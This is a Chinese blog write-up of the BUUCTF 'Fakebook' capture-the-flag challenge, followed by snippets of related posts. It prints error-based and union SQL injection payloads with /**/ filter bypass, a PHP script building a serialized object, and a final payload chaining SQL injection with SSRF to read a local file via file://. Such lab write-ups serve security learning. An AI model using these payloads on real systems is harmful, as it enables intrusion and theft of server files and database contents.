【BUUCTF】[网鼎杯 2018]Fakebook

最新推荐文章于 2024-09-11 00:04:15 发布
最新推荐文章于 2024-09-11 00:04:15 发布
阅读量733 收藏
点赞数 1
分类专栏: sql注入 php 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/aoao331198/article/details/124058628
版权

SQL注入 SSRF漏洞 数据库安全 信息窃取 curl_exec漏洞
关键词由CSDN通过智能技术生成

随便注册一个账户后,点击进去
在这里插入图片描述
url中的no引人注意,尝试no=0
在这里插入图片描述
出现了很多信息,感觉像是sql注入,于是no=1’试试
在这里插入图片描述
好,这里存在注入漏洞,一套连招下来,发现union被过滤,select存活,但是据说可以用/**/绕过,反正是没怎么过滤,想怎么来怎么来
不想写中间过程了,轻松爆出了数据库名、表名,看看最后几步

?no=1 and updatexml(1,concat('~',(select group_concat(column_name) from information_schema.columns where table_name='users'),'~'),3);

在这里插入图片描述

?no=1 and updatexml(1,concat('~',( select data from users),'~'),3);

在这里插入图片描述
我们注意到data数据是序列化好的内容,应该就是我们注册的信息,到这里sql注入也就结束了,没有flag
看wp,dirsearch一波
在这里插入图片描述
就像发现新大陆一样,先看看robots.txt(这里吐槽一下buu网站不经干,dirsearch一定要delay拉到5左右才不会炸-_-!!)

在这里插入图片描述
把这个备份文件下载下来

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }

    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
    }

}

看到blog的内容通过get函数得到

  function get($url)
    {
        $ch = curl_init();

        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);

        return $output;
    }

这里存在curl_exec()使用不当造成SSRF漏洞,之前的报错中告诉了文件路径
在这里插入图片描述

利用file协议可以得到flag.php
本地序列化代码

<?php  
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "file:///var/www/html/flag.php";
}
$a=new UserInfo();
echo serialize($a);
?>

最终payload

?no=-1 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:0:"";s:3:"age";i:0;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'

网页源码可以看到这个,base64解密一波即可
在这里插入图片描述

aoao今晚吃什么
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF部分题练习
yqdid的博客
05-03 599
[强网杯 2019]随便注 看题目的样子应该是sq注入 先添加单引号 1',发现有报错; 用order by 语句查询到有两列 1' order by 2 # 然后准备用union select 联合查询数据库时,页面回显了过滤提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 根据提示,上面...
XCTF靶场实战(3)
weixin_51339377的博客
03-29 1475
lottery 这是一个菠菜网站的源码 先正常注册一个账户 之后会送你20美元用于菠菜 之后要通过赢的美元去购买相应的flag 接下来对网站进行扫描 接下来可以通过gitHack工具下载相应的网站源码 分析后找到了漏洞的位置 接下来我们需要对抓包得到的数据包进行修改 之后放行 钱就增加了很多了。之后可以通过重放模块去刷钱 刷够了买payload即可 bug 进入以后先正常注册用户 之后登录 通过抓包分析以后 发...
BUUCTF——[网鼎杯 2018]Fakebook
m_de_g的博客
04-24 671
【代码】BUUCTF——[网鼎杯 2018]Fakebook
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 879
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
BUUCTF[网鼎杯2018]Fakebook
weixin_45253622的博客
05-22 719
我们注册一个账号看看: 注册成功如下: 这里需要注意,王小帥是可以点击的,url变为:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1我们试试sql注入; payload:http://df1a9115-0e1d-43b2-97e0-2d5ba843acf8.node3.buuoj.cn/view.php?no=1' 没什么卵用,我们访问ro...
BUUCTF-[网鼎杯 2018]Fakebook
qq_43006864的博客
04-20 1762
打开题目 点击login,一个登陆界面。没啥发现。 点击join。注册一个账号看看。 这里可以看到:http://46021289-6e25-4fee-b4db-f69979ef4362.node4.buuoj.cn:81/view.php?no=1 盲猜可以sql注入。测试了一下,貌似还不需要闭合,直接接语句就可以。 测试出来字段为4,开始尝试获取数据库信息。 貌似有waf,尝试使用/**/绕过。 成功绕过,并且发现注入点...
buuctf-[网鼎杯 2018]Fakebook
qq_42728977的博客
12-17 1138
[网鼎杯 2018]Fakebook考点复现法1,load_file()法2,纯sql注入总结参考 考点 sql注入 复现 法1,load_file() 注册登陆之后 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 可能存在注入点,尝试,发现确实有 http://7941e7a5-1b59-447e-ade4-122033824831.node4.buuoj.cn:81/view.php?no=0 un
BUUCTF:[网鼎杯 2018]Fakebook
末初的CSDN博客
11-06 2139
题目地址:https://buuoj.cn/challenges#[%E7%BD%91%E9%BC%8E%E6%9D%AF%202018]Fakebook 查看robots.txt,发现user.php.bak 下载user.php.bak <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct(.
BUUCTF [网鼎杯 2018]Fakebook 1
weixin_45642610的博客
01-19 4899
BUUCTF [网鼎杯 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
BUUCTF__[网鼎杯 2018]Fakebook_题解
风过江南乱的博客
07-04 2098
BUUCTF__[网鼎杯 2018]Fakebook_题解
网络安全 | CTFfakebook网鼎杯2018)解题详析
热门推荐
等风来
07-24 1万+
登录后发现传参,构造字符型参数,回显error判断为数字型注入,查看注入点数目:由上下两张图可知注入点数目为4经测试可知对空格进行过滤,可通过/**/或+绕过,但程序也过滤了+,因此使用前者no改为0的原因是使程序报错,从而回显库名fakebookno=0/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from information_schema.columns/**/where/**/table_name='users')
题解:BUUCTF [网鼎杯 2018]Fakebook 1
qq_62886656的博客
06-14 718
题解
[网鼎杯 2018]Fakebook 解题思路&过程
iamblackcat's blog
09-12 1752
[网鼎杯 2018]Fakebook 解题思路&过程
[BUUCTF][网鼎杯 2018]Fakebook
朋克归零膏的博客
10-25 923
BUUCTF限制了请求速率,所以扫描工具不太好使,但是字典数量巨大,因此有些文件路径是真的不太好扫出来的🥶。
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 456
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
最新发布
爱酷码的博客
09-11 162
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
攻防世界 Web_php_unserialize
beiweixiaotian66的博客
09-07 565
因为GET传参还要经过一个Base64的解码,所以对这个表达式还要经过base64的加密。因为前面还有个正则表达式,所以我们还需要绕过这个正则表达式,使用。然后我们知道怎么绕过了,可不可以直接自己手动绕过,base加密捏。如果表示对象属性个数的值大于真实的属性个数时,就可以绕过。代表着后面的变量名长度应是10,但好像只有八位?表示空字符,但是还是占用一个字符位置。但是这样的base和上面不一样。,这样base出来就是一样的了。方法,写一个反序列化的脚本。这道题我们需要的文件是。,所以我们主要需要绕过。
JAVA—网络通信
Hismybestlove的博客
09-05 1484
本文是学习网络通信入门和简单了解UDP协议和TCP协议,学习和了解CS架构和简单了解BS架构和HTTP协议
[极客大挑战 2019]Http
2201_75556700的博客
09-10 281
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个
以太坊开发环境
禅与代码的艺术
09-07 1165
详细讨论了以太坊测试网络和私有网络。在初步介绍了私有网络设置之后,演示了如何使用 Geth 命令行工具执行各种功能,以及如何与以太坊区块链进行交互。还讨论了如何使用 Mist 来部署合约和发送交易。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值